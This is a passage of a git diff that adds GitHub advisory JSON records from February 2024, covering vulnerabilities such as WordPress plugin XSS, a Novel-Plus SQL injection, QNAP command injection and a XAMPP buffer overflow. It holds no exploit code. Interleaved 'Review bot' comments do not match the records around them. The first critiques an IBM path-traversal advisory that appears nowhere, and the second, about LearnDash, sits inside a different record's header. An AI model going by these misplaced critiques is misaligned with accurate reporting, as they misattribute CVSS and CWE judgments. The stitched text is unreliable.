at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fxcj-mv3v-84c5/GHSA-fxcj-mv3v-84c5.json b/advisories/unreviewed/2024/02/GHSA-fxcj-mv3v-84c5/GHSA-fxcj-mv3v-84c5.json new file mode 100644 index 0000000000000..0f0aa3dd20ec1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fxcj-mv3v-84c5/GHSA-fxcj-mv3v-84c5.json 
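Review bot: The vector's `I:H` does not follow from the `details` text, which describes only reading ("view arbitrary files") via dot-dot sequences; a read-only traversal is normally scored `C:H/I:N`, which would bring the 8.1 down to 6.5 (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N`). If IBM's bulletin documents a write or overwrite primitive as well, the description should say so; otherwise the integrity component looks overstated. CWE-22 is correct for the issue as described.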
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fxcj-mv3v-84c5", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-1208" + ], + "details": "The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1208" + }, + { + "type": "WEB", + "url": "https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210" + }, + { + "type": "WEB", + "url": "https://www.learndash.com/release-notes/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae735117-e68b-448e-ad41-258d1be3aebc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g29c-f862-592m/GHSA-g29c-f862-592m.json b/advisories/unreviewed/2024/02/GHSA-g29c-f862-592m/GHSA-g29c-f862-592m.json new file mode 100644 index 0000000000000..b3299c109a902 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g29c-f862-592m/GHSA-g29c-f862-592m.json 
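Review bot: `cwe_ids` is empty for a described unauthenticated information exposure; `"cwe_ids": ["CWE-200"]` is the conventional mapping for this description, and CWE-862 could be added if the Wordfence entry confirms the API endpoint simply lacks an authorization check. The `https://www.learndash.com/release-notes/` reference is an unpinned index that will not stay on the fixing release; the specific release-note entry (or a versioned anchor) would be more durable. "via API" is too vague to identify the endpoint — if the PoC repository names the route, `details` should too.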
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g29c-f862-592m",
+ "modified": "2024-02-02T09:30:22Z",
+ "published": "2024-02-02T09:30:22Z",
+ "aliases": [
+ "CVE-2020-24682"
+ ],
+ "details": "Unquoted Search Path or Element vulnerability in B&R Industrial Automation Automation Studio, B&R Industrial Automation NET/PVI allows Target Programs with Elevated Privileges.This issue affects Automation Studio: from 4.6.0 through 4.6.X, from 4.7.0 before 4.7.7 SP, from 4.8.0 before 4.8.6 SP, from 4.9.0 before 4.9.4 SP; NET/PVI: from 4.6.0 through 4.6.X, from 4.7.0 before 4.7.7, from 4.8.0 before 4.8.6, from 4.9.0 before 4.9.4.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24682"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.br-automation.com/fileadmin/2021-14-BR-AS-NET-PVI-Service-Issues-c3710fbf.pdf"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-428"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T08:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g39f-q9cx-h4c7/GHSA-g39f-q9cx-h4c7.json b/advisories/unreviewed/2024/02/GHSA-g39f-q9cx-h4c7/GHSA-g39f-q9cx-h4c7.json
new file mode 100644
index 0000000000000..602cd8bcb1f32
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g39f-q9cx-h4c7/GHSA-g39f-q9cx-h4c7.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g39f-q9cx-h4c7",
+ "modified": "2024-02-08T18:30:39Z",
+ "published": "2024-02-08T18:30:39Z",
+ "aliases": [
+ "CVE-2024-25191"
+ ],
+ "details": "php-jwt 1.0.0 uses strcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25191"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/P3ngu1nW/CVE_Request/blob/main/cdoco%3Aphp-jwt.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T17:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g39j-hgm2-fxmh/GHSA-g39j-hgm2-fxmh.json b/advisories/unreviewed/2024/02/GHSA-g39j-hgm2-fxmh/GHSA-g39j-hgm2-fxmh.json
new file mode 100644
index 0000000000000..0ebdf4642eba6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g39j-hgm2-fxmh/GHSA-g39j-hgm2-fxmh.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g39j-hgm2-fxmh",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-20822"
+ ],
+ "details": "Implicit intent hijacking vulnerability in AccountActivity of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20822"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T03:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g3q6-pqr4-w43v/GHSA-g3q6-pqr4-w43v.json b/advisories/unreviewed/2024/02/GHSA-g3q6-pqr4-w43v/GHSA-g3q6-pqr4-w43v.json
new file mode 100644
index 0000000000000..1fd0d1eb389f7
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g3q6-pqr4-w43v/GHSA-g3q6-pqr4-w43v.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g3q6-pqr4-w43v",
+ "modified": "2024-02-02T12:30:30Z",
+ "published": "2024-02-02T12:30:30Z",
+ "aliases": [
+ "CVE-2024-0338"
+ ],
+ "details": "A buffer overflow vulnerability has been found in XAMPP affecting version 8.2.4 and earlier. An attacker could execute arbitrary code through a long file debug argument that controls the Structured Exception Handler (SEH).",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0338"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-xampp"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T10:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g3v7-59j8-gvqc/GHSA-g3v7-59j8-gvqc.json b/advisories/unreviewed/2024/02/GHSA-g3v7-59j8-gvqc/GHSA-g3v7-59j8-gvqc.json
new file mode 100644
index 0000000000000..b42dde4b16c37
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g3v7-59j8-gvqc/GHSA-g3v7-59j8-gvqc.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g3v7-59j8-gvqc",
+ "modified": "2024-02-01T12:30:22Z",
+ "published": "2024-02-01T12:30:22Z",
+ "aliases": [
+ "CVE-2023-52195"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Posts to Page Kerry James allows Stored XSS.This issue affects Kerry James: from n/a through 1.7.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52195"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/posts-to-page/wordpress-posts-to-page-plugin-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T10:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g43c-2v38-6gm9/GHSA-g43c-2v38-6gm9.json b/advisories/unreviewed/2024/02/GHSA-g43c-2v38-6gm9/GHSA-g43c-2v38-6gm9.json
new file mode 100644
index 0000000000000..8c8d9bae58430
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g43c-2v38-6gm9/GHSA-g43c-2v38-6gm9.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g43c-2v38-6gm9",
+ "modified": "2024-02-07T18:30:26Z",
+ "published": "2024-02-01T21:30:31Z",
+ "aliases": [
+ "CVE-2024-24945"
+ ],
+ "details": "A stored cross-site scripting (XSS) vulnerability in Travel Journal Using PHP and MySQL with Source Code v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Share Your Moments parameter at /travel-journal/write-journal.php.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24945"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/tubakvgc/CVE/blob/main/Travel_Journal_App.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://portswigger.net/web-security/cross-site-scripting"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T20:50:06Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g56c-cwv7-vvrx/GHSA-g56c-cwv7-vvrx.json b/advisories/unreviewed/2024/02/GHSA-g56c-cwv7-vvrx/GHSA-g56c-cwv7-vvrx.json
new file mode 100644
index 0000000000000..11c3610c8be3c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g56c-cwv7-vvrx/GHSA-g56c-cwv7-vvrx.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g56c-cwv7-vvrx",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-1177"
+ ],
+ "details": "The WP Club Manager – WordPress Sports Club Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the settings_save() function in all versions up to, and including, 2.2.10. This makes it possible for unauthenticated attackers to update the permalink structure for the clubs",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1177"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030843%40wp-club-manager&new=3030843%40wp-club-manager&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/64c2c8c2-58f5-4b7d-b226-39ba39e887d5?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g57h-wh27-8fc4/GHSA-g57h-wh27-8fc4.json b/advisories/unreviewed/2024/02/GHSA-g57h-wh27-8fc4/GHSA-g57h-wh27-8fc4.json
new file mode 100644
index 0000000000000..63fea1a7f0e6c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g57h-wh27-8fc4/GHSA-g57h-wh27-8fc4.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g57h-wh27-8fc4",
+ "modified": "2024-02-02T18:30:32Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2024-1186"
+ ],
+ "details": "A vulnerability classified as problematic was found in Munsoft Easy Archive Recovery 2.0. This vulnerability affects unknown code of the component Registration Key Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252676. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1186"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fitoxs.com/vuldb/12-exploit-perl.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252676"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252676"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/45884"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T17:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g5p5-rhqv-c3qj/GHSA-g5p5-rhqv-c3qj.json b/advisories/unreviewed/2024/02/GHSA-g5p5-rhqv-c3qj/GHSA-g5p5-rhqv-c3qj.json
new file mode 100644
index 0000000000000..3aab71a206642
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g5p5-rhqv-c3qj/GHSA-g5p5-rhqv-c3qj.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g5p5-rhqv-c3qj",
+ "modified": "2024-02-03T06:30:24Z",
+ "published": "2024-02-03T06:30:24Z",
+ "aliases": [
+ "CVE-2023-37528"
+ ],
+ "details": "A cross-site scripting (XSS) vulnerability in the Web Reports component of HCL BigFix Platform can possibly allow an attack to exploit an application parameter during execution of the Save Report. \n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37528"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110209"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-03T06:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g6mc-rm4g-xf26/GHSA-g6mc-rm4g-xf26.json b/advisories/unreviewed/2024/02/GHSA-g6mc-rm4g-xf26/GHSA-g6mc-rm4g-xf26.json
new file mode 100644
index 0000000000000..6c82f54d6b54b
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g6mc-rm4g-xf26/GHSA-g6mc-rm4g-xf26.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g6mc-rm4g-xf26",
+ "modified": "2024-02-05T09:30:28Z",
+ "published": "2024-02-05T09:30:28Z",
+ "aliases": [
+ "CVE-2024-24847"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jgadbois CalculatorPro Calculators allows Reflected XSS.This issue affects CalculatorPro Calculators: from n/a through 1.1.7.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24847"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/calculatorpro-calculators/wordpress-calculatorpro-calculators-plugin-1-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T07:15:13Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g7hf-vv6m-6f8q/GHSA-g7hf-vv6m-6f8q.json b/advisories/unreviewed/2024/02/GHSA-g7hf-vv6m-6f8q/GHSA-g7hf-vv6m-6f8q.json
new file mode 100644
index 0000000000000..2cf27aff1f52e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g7hf-vv6m-6f8q/GHSA-g7hf-vv6m-6f8q.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g7hf-vv6m-6f8q",
+ "modified": "2024-02-02T18:30:30Z",
+ "published": "2024-02-02T18:30:30Z",
+ "aliases": [
+ "CVE-2023-39302"
+ ],
+ "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.3.2578 build 20231110 and later\nQuTS hero h5.1.3.2578 build 20231110 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39302"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-33"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g7q9-f2h9-c7v7/GHSA-g7q9-f2h9-c7v7.json b/advisories/unreviewed/2024/02/GHSA-g7q9-f2h9-c7v7/GHSA-g7q9-f2h9-c7v7.json
new file mode 100644
index 0000000000000..cfea605716897
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g7q9-f2h9-c7v7/GHSA-g7q9-f2h9-c7v7.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g7q9-f2h9-c7v7",
+ "modified": "2024-02-08T03:32:45Z",
+ "published": "2024-02-08T03:32:45Z",
+ "aliases": [
+ "CVE-2024-24023"
+ ],
+ "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior. An attacker can pass specially crafted offset, limit, and sort parameters to perform SQL injection via /novel/bookContent/list.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24023"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/201206030/novel-plus"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24023.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T01:15:27Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g7rx-4mww-c3pc/GHSA-g7rx-4mww-c3pc.json b/advisories/unreviewed/2024/02/GHSA-g7rx-4mww-c3pc/GHSA-g7rx-4mww-c3pc.json
new file mode 100644
index 0000000000000..0f713eee7dd33
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g7rx-4mww-c3pc/GHSA-g7rx-4mww-c3pc.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g7rx-4mww-c3pc",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2023-6996"
+ ],
+ "details": "The Display custom fields in the frontend – Post and User Profile Fields plugin for WordPress is vulnerable to Code Injection via the plugin's vg_display_data shortcode in all versions up to, and including, 1.2.1 due to insufficient input validation and restriction on access to that shortcode. This makes it possible for authenticated attackers with contributor-level and above permissions to call arbitrary functions and execute code.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6996"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e0662c3a-5b82-4b9a-aa69-147094930d1f?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g82w-9p8c-7g8q/GHSA-g82w-9p8c-7g8q.json b/advisories/unreviewed/2024/02/GHSA-g82w-9p8c-7g8q/GHSA-g82w-9p8c-7g8q.json
new file mode 100644
index 0000000000000..143a77b3abff6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g82w-9p8c-7g8q/GHSA-g82w-9p8c-7g8q.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g82w-9p8c-7g8q",
+ "modified": "2024-02-01T12:30:23Z",
+ "published": "2024-02-01T12:30:23Z",
+ "aliases": [
+ "CVE-2023-51514"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codeboxr Team CBX Bookmark & Favorite allows Stored XSS.This issue affects CBX Bookmark & Favorite: from n/a through 1.7.13.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51514"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/cbxwpbookmark/wordpress-cbx-bookmark-favorite-plugin-1-7-13-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T12:15:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g9v3-2ccp-qjx4/GHSA-g9v3-2ccp-qjx4.json b/advisories/unreviewed/2024/02/GHSA-g9v3-2ccp-qjx4/GHSA-g9v3-2ccp-qjx4.json
new file mode 100644
index 0000000000000..19edf212cef0e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g9v3-2ccp-qjx4/GHSA-g9v3-2ccp-qjx4.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g9v3-2ccp-qjx4",
+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-45027"
+ ],
+ "details": "A path traversal vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to read the contents of unexpected files and expose sensitive data via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45027"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-24-02"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:50Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-g9xq-vwmw-hprm/GHSA-g9xq-vwmw-hprm.json b/advisories/unreviewed/2024/02/GHSA-g9xq-vwmw-hprm/GHSA-g9xq-vwmw-hprm.json
new file mode 100644
index 0000000000000..cfd8eb9ba5e04
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-g9xq-vwmw-hprm/GHSA-g9xq-vwmw-hprm.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g9xq-vwmw-hprm",
+ "modified": "2024-02-06T06:30:31Z",
+ "published": "2024-02-06T06:30:31Z",
+ "aliases": [
+ "CVE-2023-33058"
+ ],
+ "details": "Information disclosure in Modem while processing SIB5.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33058"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gc37-v9fg-72xc/GHSA-gc37-v9fg-72xc.json b/advisories/unreviewed/2024/02/GHSA-gc37-v9fg-72xc/GHSA-gc37-v9fg-72xc.json
new file mode 100644
index 0000000000000..8ee0e3087d31a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gc37-v9fg-72xc/GHSA-gc37-v9fg-72xc.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
